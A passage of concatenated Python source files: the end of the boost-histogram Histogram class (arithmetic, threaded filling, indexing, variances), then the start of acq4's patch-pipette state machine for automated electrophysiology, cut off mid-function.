return result._compute_inplace_op("__idiv__", other)
def __idiv__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self._compute_inplace_op("__idiv__", other)
def __itruediv__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self._compute_inplace_op("__itruediv__", other)
def __imul__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self._compute_inplace_op("__imul__", other)
def _compute_inplace_op(
self: H, name: str, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
# Also takes CppHistogram, but that confuses mypy because it's hard to pick out
if isinstance(other, Histogram):
getattr(self._hist, name)(other._hist)
elif isinstance(other, tuple(_histograms)):
getattr(self._hist, name)(other)
elif hasattr(other, "shape") and other.shape: # type: ignore
assert not isinstance(other, float)
if len(other.shape) != self.ndim:
raise ValueError(
"Number of dimensions {} must match histogram {}".format(
len(other.shape), self.ndim
)
)
elif all(a in {b, 1} for a, b in zip(other.shape, self.shape)):
view = self.view(flow=False)
getattr(view, name)(other)
elif all(a in {b, 1} for a, b in zip(other.shape, self.axes.extent)):
view = self.view(flow=True)
getattr(view, name)(other)
else:
raise ValueError(
"Wrong shape {}, expected {} or {}".format(
other.shape, self.shape, self.axes.extent
)
)
else:
view = self.view(flow=True)
getattr(view, name)(other)
self._variance_known = False
return self
# TODO: Marked as too complex by flake8. Should be factored out a bit.
def fill(
self: H,
*args: Union[ArrayLike, str],
weight: Optional[ArrayLike] = None,
sample: Optional[ArrayLike] = None,
threads: Optional[int] = None,
) -> H: # noqa: C901
"""
Insert data into the histogram.
Parameters
----------
*args : Union[Array[float], Array[int], Array[str], float, int, str]
Provide one value or array per dimension.
weight : List[Union[Array[float], Array[int], float, int, str]]]
Provide weights (only if the histogram storage supports it)
sample : List[Union[Array[float], Array[int], Array[str], float, int, str]]]
Provide samples (only if the histogram storage supports it)
threads : Optional[int]
Fill with threads. Defaults to None, which does not activate
threaded filling. Using 0 will automatically pick the number of
available threads (usually two per core).
"""
if (
self._hist._storage_type
not in {
_core.storage.weight,
_core.storage.mean,
_core.storage.weighted_mean,
}
and weight is not None
):
self._variance_known = False
# Convert to NumPy arrays
args_ars = _fill_cast(args)
weight_ars = _fill_cast(weight)
sample_ars = _fill_cast(sample)
if threads is None or threads == 1:
self._hist.fill(*args_ars, weight=weight_ars, sample=sample_ars)
return self
if threads == 0:
threads = cpu_count()
if self._hist._storage_type in {
_core.storage.mean,
_core.storage.weighted_mean,
}:
raise RuntimeError("Mean histograms do not support threaded filling")
data = [np.array_split(a, threads) for a in args_ars] # type: ignore
if weight is None or np.isscalar(weight):
assert threads is not None
weights = [weight_ars] * threads
else:
weights = np.array_split(weight_ars, threads) # type: ignore
if sample_ars is None or np.isscalar(sample_ars):
assert threads is not None
samples = [sample_ars] * threads
else:
samples = np.array_split(sample_ars, threads) # type: ignore
if self._hist._storage_type is _core.storage.atomic_int64:
def fun(
weight: Optional[ArrayLike],
sample: Optional[ArrayLike],
*args: "np.typing.NDArray[Any]",
) -> None:
self._hist.fill(*args, weight=weight, sample=sample)
else:
sum_lock = threading.Lock()
def fun(
weight: Optional[ArrayLike],
sample: Optional[ArrayLike],
*args: "np.typing.NDArray[Any]",
) -> None:
local_hist = self._hist.__copy__()
local_hist.reset()
local_hist.fill(*args, weight=weight, sample=sample)
with sum_lock:
self._hist += local_hist
thread_list = [
threading.Thread(target=fun, args=arrays)
for arrays in zip(weights, samples, *data)
]
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
return self
def __str__(self) -> str:
"""
A rendering of the histogram is made using ASCII or unicode characters
(whatever is supported by the terminal). What exactly is displayed is
still experimental. Do not rely on any particular rendering.
"""
# TODO check the terminal width and adjust the presentation
# only use for 1D, fall back to repr for ND
if self._hist.rank() != 1:
return repr(self)
s = str(self._hist)
# get rid of first line and last character
return s[s.index("\n") + 1 : -1]
def _axis(self, i: int = 0) -> Axis:
"""
Get N-th axis.
"""
return cast(self, self._hist.axis(i), Axis)
@property
def _storage_type(self) -> Type[Storage]:
return cast(self, self._hist._storage_type, Storage) # type: ignore
def _reduce(self: H, *args: Any) -> H:
return self._new_hist(self._hist.reduce(*args))
def __copy__(self: H) -> H:
return self._new_hist(copy.copy(self._hist))
def __deepcopy__(self: H, memo: Any) -> H:
return self._new_hist(copy.deepcopy(self._hist), memo=memo)
def __getstate__(self) -> Tuple[int, Dict[str, Any]]:
"""
Version 0.8: metadata added
Version 0.11: version added and set to 0. metadata/_hist replaced with dict.
Version 0.12: _variance_known is now in the dict (no format change)
``dict`` contains __dict__ with added "_hist"
"""
local_dict = copy.copy(self.__dict__)
local_dict["_hist"] = self._hist
# Version 0 of boost-histogram pickle state
return (0, local_dict)
def __setstate__(self, state: Any) -> None:
if isinstance(state, tuple):
if state[0] == 0:
for key, value in state[1].items():
setattr(self, key, value)
# Added in 0.12
if "_variance_known" not in state[1]:
self._variance_known = True
else:
msg = f"Cannot open boost-histogram pickle v{state[0]}"
raise RuntimeError(msg)
else: # Classic (0.10 and before) state
self._hist = state["_hist"]
self._variance_known = True
self.metadata = state.get("metadata", None)
for i in range(self._hist.rank()):
self._hist.axis(i).metadata = {"metadata": self._hist.axis(i).metadata}
self.axes = self._generate_axes_()
def __repr__(self) -> str:
newline = "\n "
sep = "," if len(self.axes) > 0 else ""
ret = "{self.__class__.__name__}({newline}".format(
self=self, newline=newline if len(self.axes) > 1 else ""
)
ret += f",{newline}".join(repr(ax) for ax in self.axes)
ret += "{comma}{newline}storage={storage}".format(
storage=self._storage_type(),
newline=newline
if len(self.axes) > 1
else " "
if len(self.axes) > 0
else "",
comma=sep,
)
ret += ")"
outer = self.sum(flow=True)
if outer:
inner = self.sum(flow=False)
ret += f" # Sum: {inner}"
if inner != outer:
ret += f" ({outer} with flow)"
return ret
def _compute_uhi_index(self, index: InnerIndexing, axis: int) -> SimpleIndexing:
"""
Converts an expression that contains UHI locators to one that does not.
"""
# Support sum and rebin directly
if index is sum or hasattr(index, "factor"): # type: ignore
index = slice(None, None, index)
# General locators
# Note that MyPy doesn't like these very much - the fix
# will be to properly set input types
elif callable(index):
index = index(self.axes[axis])
elif isinstance(index, SupportsIndex):
if abs(int(index)) >= self._hist.axis(axis).size:
raise IndexError("histogram index is out of range")
index %= self._hist.axis(axis).size
return index # type: ignore
def _compute_commonindex(
self, index: IndexingExpr
) -> List[Union[SupportsIndex, slice, Mapping[int, Union[SupportsIndex, slice]]]]:
"""
Takes indices and returns two iterables; one is a tuple or dict of the
original, Ellipsis expanded index, and the other returns index,
operation value pairs.
"""
indexes: List[Any]
# Shorten the computations with direct access to raw object
hist = self._hist
# Support dict access
if hasattr(index, "items"):
indexes = [slice(None)] * hist.rank()
for k, v in index.items(): # type: ignore
indexes[k] = v
# Normalize -> h[i] == h[i,]
else:
if not isinstance(index, tuple):
index = (index,)
# Now a list
indexes = _expand_ellipsis(index, hist.rank())
if len(indexes) != hist.rank():
raise IndexError("Wrong number of indices for histogram")
# Allow [bh.loc(...)] to work
for i in range(len(indexes)):
# Support list of UHI indexers
if isinstance(indexes[i], list):
indexes[i] = [self._compute_uhi_index(index, i) for index in indexes[i]]
else:
indexes[i] = self._compute_uhi_index(indexes[i], i)
return indexes
def to_numpy(
self, flow: bool = False, *, dd: bool = False, view: bool = False
) -> Union[
Tuple["np.typing.NDArray[Any]", ...],
Tuple["np.typing.NDArray[Any]", Tuple["np.typing.NDArray[Any]", ...]],
]:
"""
Convert to a NumPy style tuple of return arrays. Edges are converted to
match NumPy standards, with upper edge inclusive, unlike
boost-histogram, where upper edge is exclusive.
Parameters
----------
flow : bool = False
Include the flow bins.
dd : bool = False
Use the histogramdd return syntax, where the edges are in a tuple.
Otherwise, this is the histogram/histogram2d return style.
view : bool = False
The behavior for the return value. By default, this will return
array of the values only regardless of the storage (which is all
NumPy's histogram function can do). view=True will return the
boost-histogram view of the storage.
Return
------
contents : Array[Any]
The bin contents
*edges : Array[float]
The edges for each dimension
"""
hist, *edges = self._hist.to_numpy(flow)
hist = self.view(flow=flow) if view else self.values(flow=flow)
if dd:
return (hist, edges)
else:
return (hist, *edges)
def copy(self: H, *, deep: bool = True) -> H:
"""
Make a copy of the histogram. Defaults to making a
deep copy (axis metadata copied); use deep=False
to avoid making a copy of axis metadata.
"""
if deep:
return copy.deepcopy(self)
else:
return copy.copy(self)
def reset(self: H) -> H:
"""
Reset bin counters to default values.
"""
self._hist.reset()
return self
def empty(self, flow: bool = False) -> bool:
"""
Check to see if the histogram has any non-default values.
You can use flow=True to check flow bins too.
"""
return self._hist.empty(flow) # type: ignore
def sum(self, flow: bool = False) -> Union[float, Accumulator]:
"""
Compute the sum over the histogram bins (optionally including the flow bins).
"""
return self._hist.sum(flow) # type: ignore
@property
def size(self) -> int:
"""
Total number of bins in the histogram (including underflow/overflow).
"""
return self._hist.size() # type: ignore
@property
def shape(self) -> Tuple[int, ...]:
"""
Tuple of axis sizes (not including underflow/overflow).
"""
return self.axes.size
# TODO: Marked as too complex by flake8. Should be factored out a bit.
def __getitem__( # noqa: C901
self: H, index: IndexingExpr
) -> Union[H, float, Accumulator]:
indexes = self._compute_commonindex(index)
# If this is (now) all integers, return the bin contents
# But don't try *dict!
if not hasattr(indexes, "items"):
try:
return self._hist.at(*indexes) # type: ignore
except RuntimeError:
pass
integrations: Set[int] = set()
slices: List[_core.algorithm.reduce_command] = []
pick_each: Dict[int, int] = dict()
pick_set: Dict[int, List[int]] = dict()
# Compute needed slices and projections
for i, ind in enumerate(indexes):
if hasattr(ind, "__index__"):
pick_each[i] = ind.__index__() + ( # type: ignore
1 if self.axes[i].traits.underflow else 0
)
continue
elif isinstance(ind, collections.abc.Sequence):
pick_set[i] = list(ind)
continue
elif not isinstance(ind, slice):
raise IndexError(
"Must be a slice, an integer, or follow the locator protocol."
)
# If the dictionary brackets are forgotten, it's easy to put a slice
# into a slice - adding a nicer error message in that case
if any(isinstance(v, slice) for v in (ind.start, ind.stop, ind.step)):
raise TypeError(
"You have put a slice in a slice. Did you forget curly braces [{...}]?"
)
# This ensures that callable start/stop are handled
start, stop = self.axes[i]._process_loc(ind.start, ind.stop)
if ind != slice(None):
merge = 1
if ind.step is not None:
if hasattr(ind.step, "factor"):
merge = ind.step.factor
elif callable(ind.step):
if ind.step is sum:
integrations.add(i)
else:
raise RuntimeError("Full UHI not supported yet")
if ind.start is not None or ind.stop is not None:
slices.append(
_core.algorithm.slice(
i, start, stop, _core.algorithm.slice_mode.crop
)
)
continue
else:
raise IndexError(
"The third argument to a slice must be rebin or projection"
)
assert isinstance(start, int)
assert isinstance(stop, int)
slices.append(_core.algorithm.slice_and_rebin(i, start, stop, merge))
logger.debug("Reduce with %s", slices)
reduced = self._hist.reduce(*slices)
if pick_set:
warnings.warn(
"List indexing selection is experimental. Removed bins are not placed in overflow."
)
logger.debug("Slices for picking sets: %s", pick_set)
axes = [reduced.axis(i) for i in range(reduced.rank())]
reduced_view = reduced.view(flow=True)
for i in pick_set:
selection = copy.copy(pick_set[i])
ax = reduced.axis(i)
if ax.traits_ordered:
raise RuntimeError(
f"Axis {i} is not a categorical axis, cannot pick with list"
)
if ax.traits_overflow and ax.size not in pick_set[i]:
selection.append(ax.size)
new_axis = axes[i].__class__([axes[i].value(j) for j in pick_set[i]])
new_axis.metadata = axes[i].metadata
axes[i] = new_axis
reduced_view = np.take(reduced_view, selection, axis=i)
logger.debug("Axes: %s", axes)
new_reduced = reduced.__class__(axes)
new_reduced.view(flow=True)[...] = reduced_view
reduced = new_reduced
if pick_each:
tuple_slice = tuple(
pick_each.get(i, slice(None)) for i in range(reduced.rank())
)
logger.debug("Slices for pick each: %s", tuple_slice)
axes = [
reduced.axis(i) for i in range(reduced.rank()) if i not in pick_each
]
logger.debug("Axes: %s", axes)
new_reduced = reduced.__class__(axes)
new_reduced.view(flow=True)[...] = reduced.view(flow=True)[tuple_slice]
reduced = new_reduced
integrations = {i - sum(j <= i for j in pick_each) for i in integrations}
if integrations:
projections = [i for i in range(reduced.rank()) if i not in integrations]
reduced = reduced.project(*projections)
return self._new_hist(reduced) if reduced.rank() > 0 else reduced.sum(flow=True)
def __setitem__(
self, index: IndexingExpr, value: Union[ArrayLike, Accumulator]
) -> None:
"""
There are several supported possibilities:
h[slice] = array # same size
If an array is given to a compatible slice, it is set.
h[a:] = array # One larger
If an array is given that does not match, if it does match the
with-overflow size, it fills that.
PLANNED (not yet supported):
h[a:] = h2
If another histogram is given, that must either match with or without
overflow, where the overflow bins must be overflow bins (that is,
you cannot set a histogram's flow bins from another histogram that
is 2 larger). Bin edges must be a close match, as well. If you don't
want this level of type safety, just use ``h[...] = h2.view()``.
"""
indexes = self._compute_commonindex(index)
if isinstance(value, Histogram):
raise TypeError("Not supported yet")
value = np.asarray(value)
view = self.view(flow=True)
# Support raw arrays for accumulators, the final dimension is the constructor values
if (
value.ndim > 0
and len(view.dtype) > 0 # type: ignore
and len(value.dtype) == 0
and len(view.dtype) == value.shape[-1] # type: ignore
):
value_shape = value.shape[:-1]
value_ndim = value.ndim - 1
else:
value_shape = value.shape
value_ndim = value.ndim
# NumPy does not broadcast partial slices, but we would need
# to allow it (because we do allow broadcasting up dimensions)
# Instead, we simply require matching dimensions.
if value_ndim > 0 and value_ndim != sum(isinstance(i, slice) for i in indexes):
raise ValueError(
"Setting a {}D histogram with a {}D array must have a matching number of dimensions".format(
len(indexes), value_ndim
)
)
# Here, value_n does not increment with n if this is not a slice
value_n = 0
for n, request in enumerate(indexes):
has_underflow = self.axes[n].traits.underflow
has_overflow = self.axes[n].traits.overflow
if isinstance(request, slice):
# Only consider underflow/overflow if the endpoints are not given
use_underflow = has_underflow and request.start is None
use_overflow = has_overflow and request.stop is None
# Make the limits explicit since we may need to shift them
start = 0 if request.start is None else request.start
stop = len(self.axes[n]) if request.stop is None else request.stop
request_len = stop - start
# If set to a scalar, then treat it like broadcasting without flow bins
if value_ndim == 0:
start = 0 + has_overflow
stop = len(self.axes[n]) + has_underflow
# Normal setting
elif request_len == value_shape[value_n]:
start += has_underflow
stop += has_underflow
# Expanded setting
elif request_len + use_underflow + use_overflow == value_shape[value_n]:
start += has_underflow and not use_underflow
stop += has_underflow + (has_overflow and use_overflow)
# Single element broadcasting
elif value_shape[value_n] == 1:
start += has_underflow
stop += has_underflow
else:
msg = f"Mismatched shapes in dimension {n}"
msg += f", {value_shape[n]} != {request_len}"
if use_underflow or use_overflow:
msg += " or {}".format(
request_len + use_underflow + use_overflow
)
raise ValueError(msg)
indexes[n] = slice(start, stop, request.step)
value_n += 1
else:
indexes[n] = request + has_underflow
view[tuple(indexes)] = value # type: ignore
def project(self: H, *args: int) -> Union[H, float, Accumulator]:
"""
Project to a single axis or several axes on a multidimensional histogram.
Provided a list of axis numbers, this will produce the histogram over
those axes only. Flow bins are used if available.
"""
return self._new_hist(self._hist.project(*args))
# Implementation of PlottableHistogram
@property
def kind(self) -> Kind:
"""
Returns Kind.COUNT if this is a normal summing histogram, and Kind.MEAN if this is a
mean histogram.
:return: Kind
"""
if self._hist._storage_type in {
_core.storage.mean,
_core.storage.weighted_mean,
}:
return Kind.MEAN
else:
return Kind.COUNT
def values(self, flow: bool = False) -> "np.typing.NDArray[Any]":
"""
Returns the accumulated values. The counts for simple histograms, the
sum of weights for weighted histograms, the mean for profiles, etc.
If counts is equal to 0, the value in that cell is undefined if
kind == "MEAN".
:param flow: Enable flow bins. Not part of PlottableHistogram, but
included for consistency with other methods and flexibility.
:return: "np.typing.NDArray[Any]"[np.float64]
"""
view = self.view(flow)
# TODO: Might be a NumPy typing bug
if len(view.dtype) == 0: # type: ignore
return view
else:
return view.value # type: ignore
def variances(self, flow: bool = False) -> Optional["np.typing.NDArray[Any]"]:
"""
Returns the estimated variance of the accumulated values. The sum of squared
weights for weighted histograms, the variance of samples for profiles, etc.
For an unweighed histogram where kind == "COUNT", this should return the same
as values if the histogram was not filled with weights, and None otherwise.
If counts is equal to 1 or less, the variance in that cell is undefined if
kind == "MEAN". This must be written <= 1, and not < 2; when this
effective counts (weighed mean), then counts could be less than 2 but
more than 1.
If kind == "MEAN", the counts can be used to compute the error on the mean
as sqrt(variances / counts), this works whether or not the entries are
weighted if the weight variance was tracked by the implementation.
Currently, this always returns - but in the future, it will return None
if a weighted fill is made on a unweighed storage.
:param flow: Enable flow bins. Not part of PlottableHistogram, but
included for consistency with other methods and flexibility.
:return: "np.typing.NDArray[Any]"[np.float64]
"""
view = self.view(flow)
if len(view.dtype) == 0: # type: ignore
if self._variance_known:
return view
else:
return None
elif hasattr(view, "sum_of_weights"):
return np.divide( # type: ignore
view.variance, # type: ignore
view.sum_of_weights, # type: ignore
out=np.full(view.sum_of_weights.shape, np.nan), # type: ignore
where=view.sum_of_weights > 1, # type: ignore
)
elif hasattr(view, "count"):
return np.divide( # type: ignore
view.variance, # type: ignore
view.count, # type: ignore
out=np.full(view.count.shape, np.nan), # type: ignore
where=view.count > 1, # type: ignore
)
else:
return view.variance # type: ignore
def counts(self, flow: bool = False) -> "np.typing.NDArray[Any]":
"""
Returns the number of entries in each bin for an unweighted
histogram or profile and an effective number of entries (defined below)
for a weighted histogram or profile. An exotic generalized histogram could
have no sensible .counts, so this is Optional and should be checked by
Consumers.
If kind == "MEAN", counts (effective or not) can and should be used to
determine whether the mean value and its variance should be displayed
(see documentation of values and variances, respectively). The counts
should also be used to compute the error on the mean (see documentation
of variances).
For a weighted histogram, counts is defined as sum_of_weights ** 2 /
sum_of_weights_squared. It is equal or less than the number of times
the bin was filled, the equality holds when all filled weights are equal.
The larger the spread in weights, the smaller it is, but it is always 0
if filled 0 times, and 1 if filled once, and more than 1 otherwise.
:return: "np.typing.NDArray[Any]"[np.float64]
"""
view = self.view(flow)
if len(view.dtype) == 0: # type: ignore
return view
elif hasattr(view, "sum_of_weights"):
return np.divide( # type: ignore
view.sum_of_weights ** 2, # type: ignore
view.sum_of_weights_squared, # type: ignore
out=np.zeros_like(view.sum_of_weights, dtype=np.float64), # type: ignore
where=view.sum_of_weights_squared != 0, # type: ignore
)
elif hasattr(view, "count"):
return view.count # type: ignore
else:
return view.value # type: ignore
if TYPE_CHECKING:
import typing
from uhi.typing.plottable import PlottableHistogram
_: PlottableHistogram = typing.cast(Histogram, None)
|
states.py
|
from __future__ import print_function
import threading
import sys, time
import numpy as np
import scipy.stats
from six.moves import range, queue
from pyqtgraph import ptime, disconnect
from acq4.util.future import Future
from collections import deque
from acq4.util.debug import printExc
class PatchPipetteState(Future):
"""Base class for implementing the details of a patch pipette state:
- Set initial pressure, clamp parameters, position, etc when starting the state
- Optionally run a background thread; usually this will monitor pipette resistance
and affect the pipette pressure, holding value, or position.
This class is the base for other state subclasses classes and just takes care of some boilerplate:
- assembling config from defaults and init args
- set initial device state
- starting thread (if run() method is implemented)
- handling various job failure / finish modes
- communicating next state transition to the state manager
"""
# state subclasses must set a string name
stateName = None
# State classes may implement a run() method to be called in a background thread
run = None
def __init__(self, dev, config=None):
Future.__init__(self)
self.dev = dev
# generate full config by combining passed-in arguments with default config
self.config = self.defaultConfig()
if config is not None:
self.config.update(config)
# indicates state that should be transitioned to next, if any.
# This is usually set by the return value of run(), and must be invoked by the state manager.
self.nextState = self.config.get('fallbackState', None)
def initialize(self):
"""Initialize pressure, clamp, etc. and start background thread when entering this state.
This method is called by the state manager.
"""
try:
if self.config.get('finishPatchRecord') is True:
self.dev.finishPatchRecord()
if self.config.get('newPipette') is True:
self.dev.newPipette()
self.initializePressure()
self.initializeClamp()
# set up test pulse monitoring
self.testPulseResults = queue.Queue()
if self.run is not None and self.dev.active:
# start background thread if the device is "active" and the subclass has a run() method
self._thread = threading.Thread(target=self._runJob)
self._thread.start()
else:
# otherwise, just mark the task complete
self._taskDone(interrupted=False, error=None)
except Exception as exc:
self._taskDone(interrupted=True, error=str(exc))
raise
def initializePressure(self):
"""Set initial pressure based on the config keys 'initialPressureSource' and 'initialPressure'
"""
if self.dev.pressureDevice is None:
return
pressure = self.config.get('initialPressure', None)
source = self.config.get('initialPressureSource', None)
self.dev.pressureDevice.setPressure(source=source, pressure=pressure)
def initializeClamp(self):
"""Set initial clamp parameters based on the config keys
'initialClampMode', 'initialClampHolding', and 'initialTestPulseEnable'.
"""
cdev = self.dev.clampDevice
if cdev is None:
return
mode = self.config.get('initialClampMode')
holding = self.config.get('initialClampHolding')
tp = self.config.get('initialTestPulseEnable')
tpParams = self.config.get('initialTestPulseParameters')
bias = self.config.get('initialAutoBiasEnable')
biasTarget = self.config.get('initialAutoBiasTarget')
if mode is not None:
cdev.setMode(mode)
if holding is not None:
cdev.setHolding(mode=mode, value=holding)
if tpParams is None:
tpParams = {}
tpParams.setdefault('clampMode', mode)
# enable test pulse if config requests it AND the device is "active"
if tp is not None:
self.dev.enableTestPulse(tp and self.dev.active)
if tpParams is not None:
self.dev.setTestPulseParameters(**tpParams)
if bias is not None:
self.dev.enableAutoBias(bias)
if biasTarget is not None:
self.dev.setAutoBiasTarget(biasTarget)
def monitorTestPulse(self):
"""Begin acquiring test pulse data in self.testPulseResults
"""
self.dev.sigTestPulseFinished.connect(self.testPulseFinished)
def testPulseFinished(self, pip, result):
self.testPulseResults.put(result)
def getTestPulses(self, timeout):
"""Get all test pulses in the queue. If no test pulses are available, then
wait *timeout* seconds for one to arrive.
"""
tps = []
try:
if timeout is not None:
tps.append(self.testPulseResults.get(timeout=timeout))
while not self.testPulseResults.empty():
tps.append(self.testPulseResults.get())
except queue.Empty:
pass
return tps
def defaultConfig(self):
"""Subclasses may reimplement this method to return a default configuration dict.
"""
return self._defaultConfig
def cleanup(self):
"""Called after job completes, whether it failed or succeeded.
"""
pass
def _runJob(self):
"""Function invoked in background thread.
This calls the custom run() method for the state subclass and handles the possible
error / exit / completion states.
"""
error = None
excInfo = None
try:
# run must be reimplemented in subclass and call self._checkStop() frequently
self.nextState = self.run()
interrupted = self.wasInterrupted()
except self.StopRequested:
# state was stopped early by calling stop()
interrupted = True
except Exception as exc:
# state aborted due to an error
interrupted = True
printExc("Error in %s state %s" % (self.dev.name(), self.stateName))
error = str(exc)
excInfo = sys.exc_info()
else:
# state completed successfully
interrupted = False
finally:
disconnect(self.dev.sigTestPulseFinished, self.testPulseFinished)
if not self.isDone():
self._taskDone(interrupted=interrupted, error=error, excInfo=excInfo)
def _checkStop(self, delay=0):
# extend checkStop to also see if the pipette was deactivated.
if self.dev.active is False:
raise self.StopRequested()
Future._checkStop(self, delay)
def __repr__(self):
return '<%s "%s">' % (type(self).__name__, self.stateName)
class PatchPipetteOutState(PatchPipetteState):
stateName = 'out'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': False,
'finishPatchRecord': True,
}
class PatchPipetteApproachState(PatchPipetteState):
stateName = 'approach'
_defaultConfig = {
'nextState': 'cell detect',
'fallbackState': 'bath',
}
def run(self):
# move to approach position + auto pipette offset
fut = self.dev.pipetteDevice.goApproach('fast')
self.dev.clampDevice.autoPipetteOffset()
self.dev.resetTestPulseHistory()
self.waitFor(fut)
return self.config['nextState']
class PatchPipetteWholeCellState(PatchPipetteState):
stateName = 'whole cell'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': -70e-3,
'initialTestPulseEnable': True,
'initialAutoBiasEnable': True,
'initialAutoBiasTarget': -70e-3,
}
def run(self):
config = self.config
patchrec = self.dev.patchRecord()
patchrec['wholeCellStartTime'] = ptime.time()
patchrec['wholeCellPosition'] = tuple(self.dev.pipetteDevice.globalPosition())
# TODO: Option to switch to I=0 for a few seconds to get initial RMP decay
while True:
# TODO: monitor for cell loss
self._checkStop()
time.sleep(0.1)
def cleanup(self):
patchrec = self.dev.patchRecord()
patchrec['wholeCellStopTime'] = ptime.time()
PatchPipetteState.cleanup(self)
class PatchPipetteBrokenState(PatchPipetteState):
stateName = 'broken'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'finishPatchRecord': True,
}
def initialize(self):
self.dev.setTipBroken(True)
PatchPipetteState.initialize(self)
class PatchPipetteFouledState(PatchPipetteState):
stateName = 'fouled'
_defaultConfig = {
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
}
def initialize(self):
self.dev.setTipClean(False)
PatchPipetteState.initialize(self)
class PatchPipetteBathState(PatchPipetteState):
"""Handles detection of changes while in recording chamber
- monitor resistance to detect entry into bath
- auto pipette offset and record initial resistance
- monitor resistance for pipette break / clog
"""
stateName = 'bath'
def __init__(self, *args, **kwds):
PatchPipetteState.__init__(self, *args, **kwds)
_defaultConfig = {
'initialPressure': 3500., # 0.5 PSI
'initialPressureSource': 'regulator',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'bathThreshold': 50e6,
'breakThreshold': -1e6,
'clogThreshold': 1e6,
'targetDistanceThreshold': 10e-6
}
def run(self):
self.monitorTestPulse()
config = self.config
dev = self.dev
initialResistance = None
bathResistances = []
while True:
self._checkStop()
# pull in all new test pulses (hopefully only one since the last time we checked)
tps = self.getTestPulses(timeout=0.2)
if len(tps) == 0:
continue
tp = tps[-1] # if we're falling behind, just skip the extra test pulses
ssr = tp.analysis()['steadyStateResistance']
if ssr > config['bathThreshold']:
# not in bath yet
bathResistances = []
continue
bathResistances.append(ssr)
if initialResistance is None:
if len(bathResistances) > 8:
initialResistance = np.median(bathResistances)
self.setState('initial resistance measured: %0.2f MOhm' % (initialResistance * 1e-6))
# record initial resistance
patchrec = dev.patchRecord()
patchrec['initialBathResistance'] = initialResistance
piprec = dev.pipetteRecord()
if piprec['originalResistance'] is None:
piprec['originalResistance'] = initialResistance
patchrec['originalPipetteResistance'] = initialResistance
else:
continue
# check for pipette break
if config['breakThreshold'] is not None and (ssr < initialResistance + config['breakThreshold']):
self.setState('broken pipette detected')
self._taskDone(interrupted=True, error="Pipette broken")
return 'broken'
# if close to target, switch to cell detect
# pos = dev.globalPosition()
# target = dev.
if config['clogThreshold'] is not None and (ssr > initialResistance + config['clogThreshold']):
self.setState('clogged pipette detected')
self._taskDone(interrupted=True, error="Pipette clogged")
return 'fouled'
class PatchPipetteCellDetectState(PatchPipetteState):
"""Handles cell detection:
- monitor resistance for cell proximity => seal mode
- monitor resistance for pipette break
TODO:
- Obstacle avoidance
"""
stateName = 'cell detect'
def __init__(self, *args, **kwds):
self.contAdvanceFuture = None
self.lastMove = 0.0
self.stepCount = 0
self.advanceSteps = None
PatchPipetteState.__init__(self, *args, **kwds)
_defaultConfig = {
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'fallbackState': 'bath',
'autoAdvance': True,
'advanceMode': 'target',
'advanceContinuous': True,
'advanceStepInterval': 0.1,
'advanceStepDistance': 1e-6,
'maxAdvanceDistance': None,
'maxAdvanceDistancePastTarget': 10e-6,
'maxAdvanceDepthBelowSurface': None,
'advanceSpeed': 2e-6,
'fastDetectionThreshold': 1e6,
'slowDetectionThreshold': 0.2e6,
'slowDetectionSteps': 3,
'breakThreshold': -1e6,
}
def run(self):
self.monitorTestPulse()
config = self.config
dev = self.dev
dev.clampDevice.autoPipetteOffset()
patchrec = dev.patchRecord()
patchrec['attemptedCellDetect'] = True
initialResistance = None
recentTestPulses = deque(maxlen=config['slowDetectionSteps'] + 1)
initialPosition = np.array(dev.pipetteDevice.globalPosition())
patchrec['cellDetectInitialTarget'] = tuple(dev.pipetteDevice.targetPosition())
while True:
self._checkStop()
# pull in all new test pulses (hopefully only one since the last time we checked)
tps = self.getTestPulses(timeout=0.2)
if len(tps) == 0:
continue
recentTestPulses.extend(tps)
tp = tps[-1]
ssr = tp.analysis()['steadyStateResistance']
if initialResistance is None:
# take note of initial resistance
initialResistance = ssr
# check for pipette break
if ssr < initialResistance + config['breakThreshold']:
self._taskDone(interrupted=True, error="Pipette broken")
patchrec['detectedCell'] = False
return 'broken'
# fast cell detection
if ssr > initialResistance + config['fastDetectionThreshold']:
self.setState("cell detected (fast criteria)")
self._taskDone()
patchrec['detectedCell'] = True
return "seal"
# slow cell detection
if len(recentTestPulses) > config['slowDetectionSteps']:
res = np.array([tp.analysis()['steadyStateResistance'] for tp in recentTestPulses])
if np.all(np.diff(res) > 0) and ssr - initialResistance > config['slowDetectionThreshold']:
self.setState("cell detected (slow criteria)")
self._taskDone()
patchrec['detectedCell'] = True
return "seal"
self._checkStop()
if config['autoAdvance']:
if config['advanceContinuous']:
# Start continuous move if needed
if self.contAdvanceFuture is None:
print(initialPosition)
print(self.getSearchEndpoint())
self.startContinuousMove()
if self.contAdvanceFuture.isDone():
self.contAdvanceFuture.wait() # check for move errors
self._taskDone(interrupted=True, error="No cell found before end of search path")
patchrec['detectedCell'] = False
return config['fallbackState']
else:
# advance to next position if stepping
if self.advanceSteps is None:
self.advanceSteps = self.getAdvanceSteps()
print(len(self.advanceSteps))
print(self.advanceSteps)
if self.stepCount >= len(self.advanceSteps):
self._taskDone(interrupted=True, error="No cell found before end of search path")
patchrec['detectedCell'] = False
return config['fallbackState']
# make sure we obey advanceStepInterval
now = ptime.time()
if now - self.lastMove < config['advanceStepInterval']:
continue
self.lastMove = now
self.singleStep()
def getSearchEndpoint(self):
"""Return the final position along the pipette search path, taking into account
maxAdvanceDistance, maxAdvanceDepthBelowSurface, and maxAdvanceDistancePastTarget.
"""
config = self.config
dev = self.dev
pip = dev.pipetteDevice
pos = np.array(pip.globalPosition())
surface = pip.scopeDevice().getSurfaceDepth()
target = np.array(pip.targetPosition())
# what direction are we moving?
if config['advanceMode'] == 'vertical':
